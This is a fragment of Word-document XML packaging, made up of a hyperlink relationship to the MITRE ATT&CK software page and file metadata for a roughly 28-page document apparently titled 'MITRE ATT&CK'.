Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/?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C174A4-55E0-4ADF-9B78-E2145B98A0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28</Pages>
  <Words>7638</Words>
  <Characters>43541</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MITRE ATT&amp;CK</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>51077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MITRE ATT&amp;CK</dc:title>
  <dc:subject/>
  <dc:creator>PIYUSH DHANU</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>PIYUSH DHANU</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-14T18:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T18:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>